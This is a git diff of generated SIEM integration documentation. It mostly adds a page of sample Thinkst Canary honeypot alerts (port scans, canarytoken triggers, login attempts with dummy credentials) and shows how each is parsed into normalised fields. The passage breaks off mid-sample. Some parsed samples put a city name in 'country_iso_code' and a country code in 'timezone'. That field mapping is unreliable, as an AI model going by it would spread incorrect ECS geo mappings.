"test_ingest_ipv4_carp_logs.json" diff --git a/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md b/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md index d25292959d..4e095dfce4 100644 --- a/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md +++ b/_shared_content/operations_center/integrations/generated/864ade96-a96d-4a0e-ab3d-b7cb7b7db618.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "query_log.json" diff --git a/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md b/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md index 319f42886a..63afcd76dd 100644 --- a/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md +++ b/_shared_content/operations_center/integrations/generated/890207d2-4878-440d-9079-3dd25d472e0a.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert_failed_auth.json" diff --git a/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8.md b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8.md new file mode 100644 index 0000000000..48aeb1ef66 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8.md 
@@ -0,0 +1,1272 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Network intrusion detection system` | None | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `alert` | +| Category | `intrusion_detection` | +| Type | `denied` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
+ +=== "test_consolidated_network_port_scan.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Consolidated Network Port Scan\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"23\": [\"5.6.7.8\"], \"80\": [\"5.6.7.8\"], \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"5007\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "5007", + "reason": "Consolidated Network Port Scan", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_dns_canary_token.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", 
\"created\": \"1721315330\", \"created_std\": \"2024-07-18 15:08:50 UTC+0000\", \"description\": \"Canarytoken triggered\", \"dst_host\": \"5.6.7.8\", \"dst_port\": 53, \"canarytoken\": \"1111111111111111111111111\", \"geoip\": {\"city\": \"Paris\", \"continent_code\": \"EU\", \"country\": \"France\", \"country_code\": \"FR\", \"country_code3\": \"FRA\", \"currency_code\": \"EUR\", \"host_domain\": \"\", \"hostname\": \"\", \"ip\": \"1.2.3.4\", \"is_bogon\": false, \"is_v4_mapped\": false, \"is_v6\": false, \"latitude\": 48.859077, \"longitude\": 2.293486, \"region\": \"Ile-de-France\", \"region_code\": \"J\", \"timezone\": {\"abbr\": \"CEST\", \"date\": \"2024-07-18\", \"id\": \"Europe/Paris\", \"name\": \"Central European Summer Time\", \"offset\": \"+02:00\", \"time\": \"17:08:54.722399\"}, \"valid\": true}, \"hostname\": \"1111111111111111111111111.example.org\", \"ip_blocklist\": {\"is_proxy\": false, \"is_tor\": false, \"is_vpn\": false}, \"src_host\": \"1.2.3.4\", \"timestamp\": 1721315332, \"timestamp_std\": \"2024-07-18 15:08:52 UTC+0000\", \"type\": \"dns\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"local_time\": \"2024-07-18 15:08:50 (UTC)\", \"logtype\": \"16000\", \"matched_annotations\": {}, \"memo\": \"Integration dns\", \"name\": \"N/A\", \"node_id\": \"1111111111111111111111111\", \"notified\": \"False\", \"src_port\": \"40296\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "16000", + "dataset": "dns", + "reason": "Canarytoken triggered", + "start": "2024-07-18T15:08:50Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-18T15:08:52Z", + "destination": { + "address": "1111111111111111111111111.example.org", + "domain": "1111111111111111111111111.example.org", + "ip": "5.6.7.8", + "port": 53, + "registered_domain": "example.org", + "subdomain": "1111111111111111111111111", + "top_level_domain": "org" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + 
"related": { + "hosts": [ + "1111111111111111111111111.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Paris", + "continent_code": "EU", + "country_iso_code": "Paris", + "timezone": "FR" + }, + "ip": "1.2.3.4", + "port": 40296 + }, + "thinkst_canary": { + "canary_token": "1111111111111111111111111", + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_ftp_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"FTP Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"PASSWORD\": \"mypasswordverysecured\", \"USERNAME\": \"jdoe\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"2000\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "2000", + "reason": "FTP Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": 
"vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_git_repository_clone_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Git Repository Clone Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"HOST\": \"git.example.org\", \"REPO\": \"mypreviousrepository\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"19001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "19001", + "reason": "Git Repository Clone Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "git.example.org", + "domain": "git.example.org", + "ip": "5.6.7.8", + "port": 22, + "registered_domain": "example.org", + "subdomain": "git", + "top_level_domain": "org" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "git.example.org", + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": 
{ + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "repo": "mypreviousrepository" + } + } + + ``` + + +=== "test_host_port_scan.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Host Port Scan\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"ports\": \"23,80,443\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"5002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "5002", + "reason": "Host Port Scan", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": 
"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "ports": "23,80,443" + } + } + + ``` + + +=== "test_http_api_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP API Request\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"HEADERS\": {\"Accept\": \"*/*\", \"Host\": \"1111111111.example.org\", \"User-Agent\": \"curl/8.7.1\"}, \"METHOD\": \"POST\", \"PATH\": \"/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"POSTDATA\": {}, \"RESPONSE\": 200, \"HOSTNAME\": \"1111111111.example.org\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3005\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3005", + "reason": "HTTP API Request", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "1111111111.example.org", + "domain": "1111111111.example.org", + "ip": "5.6.7.8", + "port": 22, + "registered_domain": "example.org", + "subdomain": "1111111111", + "top_level_domain": "org" + }, + "http": { + "request": { + "method": "POST" + }, + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "1111111111.example.org", + "vm000000.example.org" + ], + 
"ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "url": { + "path": "/path/to/a/secret/" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_canary_token.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684212\", \"created_std\": \"2024-07-11 07:50:12 UTC+0000\", \"description\": \"Canarytoken triggered\", \"dst_host\": \"5.6.7.8\", \"dst_port\": 80, \"canarytoken\": \"xxxxxxxxxxxxxxxxxxxx\", \"geoip\": {\"city\": \"Emerainville\", \"continent_code\": \"EU\", \"country\": \"France\", \"country_code\": \"FR\", \"country_code3\": \"FRA\", \"currency_code\": \"EUR\", \"host_domain\": \"\", \"hostname\": \"\", \"ip\": \"1.2.3.4\", \"is_bogon\": false, \"is_v4_mapped\": false, \"is_v6\": false, \"latitude\": 48.81276, \"longitude\": 2.62139, \"region\": \"Ile-de-France\", \"region_code\": \"J\", \"timezone\": {\"abbr\": \"CEST\", \"date\": \"2024-07-11\", \"id\": \"Europe/Paris\", \"name\": \"Central European Summer Time\", \"offset\": \"+02:00\", \"time\": \"09:50:16.622847\"}, \"valid\": true}, \"headers\": {\"Accept\": \"*/*\", \"Host\": \"1111111111.example.org\", \"User-Agent\": \"curl/8.7.1\"}, \"ip_blocklist\": {\"is_proxy\": false, \"is_tor\": false, \"is_vpn\": false}, \"request_args\": {}, \"timestamp\": 1720684212, \"timestamp_std\": \"2024-07-11 07:50:12 UTC+0000\", \"type\": \"http\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", 
\"local_time\": \"2024-07-11 07:50:12 (UTC)\", \"logtype\": \"17000\", \"matched_annotations\": {}, \"memo\": \"Link to generate alert\", \"name\": \"N/A\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_port\": \"0\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "17000", + "dataset": "http", + "reason": "Canarytoken triggered", + "start": "2024-07-11T07:50:12Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:50:12Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 80 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Emerainville", + "continent_code": "EU", + "country_iso_code": "Emerainville", + "timezone": "FR" + }, + "ip": "1.2.3.4", + "port": 0 + }, + "thinkst_canary": { + "canary_token": "xxxxxxxxxxxxxxxxxxxx", + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"METHOD\": \"GET\", \"CHANNEL\": \"TLS\", \"PATH\": \"/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"RESPONSE\": 200, \"USERNAME\": \"jdoe\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default 
Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3001", + "reason": "HTTP Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "tls": { + "established": true + }, + "url": { + "path": "/path/to/a/secret/" + }, + "user": { + "name": "jdoe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_page_load.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP Page Load\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"METHOD\": 
\"GET\", \"CHANNEL\": \"TLS\", \"PATH\": \"/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"RESPONSE\": 200, \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3000\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3000", + "reason": "HTTP Page Load", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "tls": { + "established": true + }, + "url": { + "path": "/path/to/a/secret/" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_proxy_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": 
\"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP Proxy Request\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"URL\": \"https://example.org/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"USERNAME\": \"jdoe\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3001", + "reason": "HTTP Proxy Request", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "url": { + "domain": "example.org", + "original": "https://example.org/path/to/a/secret/", + "path": "/path/to/a/secret/", + "port": 443, + "registered_domain": "example.org", + "scheme": "https", + "top_level_domain": "org" + }, + "user": { + "name": "jdoe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": 
"curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_incident.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"incident\", \"summary\": \"Canarytoken triggered\", \"timestamp\": \"1720684212\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Canarytoken triggered", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:50:12Z", + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_ldap_bind_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"LDAP Bind Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"DN\": \"uid=john.doe,ou=People,dc=example,dc=com\", \"MECH\": \"GSSAPI\", \"VER\": \"1.0.2\", \"REQ\": \"request\", \"TYPE\": \"PASSWORD\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"31001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "31001", + "reason": "LDAP Bind Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + 
"denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "domain": "example.com" + } + } + + ``` + + +=== "test_mongo_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Mongo Authentication Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"cmd\": \"insert\", \"db\": \"mydatabase\", \"user\": \"myuser\", \"password\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": 